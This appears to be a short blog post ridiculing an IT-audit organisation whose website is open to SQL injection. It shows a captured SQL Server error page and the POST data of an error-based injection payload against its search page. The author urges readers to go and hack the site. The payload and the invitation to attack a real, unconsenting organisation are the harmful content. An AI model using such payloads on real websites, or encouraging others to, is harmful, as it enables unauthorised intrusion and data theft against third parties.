Mess with the best, die like the rest… 

Facebook

IT audit website not so “audited”? SQL injection re-visited

What happen if organisation that promoting IT audit is not so ‘audited’ in term of security? by refering to here
you start hack their website.  Enjoy.

  • Error Type:
    Microsoft OLE DB Provider for SQL Server (0x80040E14)
    Line 1: Incorrect syntax near ‘%’.
    /search.asp, line 71
  • Browser Type:
    Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
  • Page:
    POST 73 bytes to /search.asp
  • POST Data:
    keyword=%27and+1+in+%28SELECT+%40%40SERVERNAME%29&submit.x=14&submit.y=16
  •  

    You must be logged in , to post a comment.

    Home Uncategorized IT audit website not so “audited”? SQL injection re-visited
    credit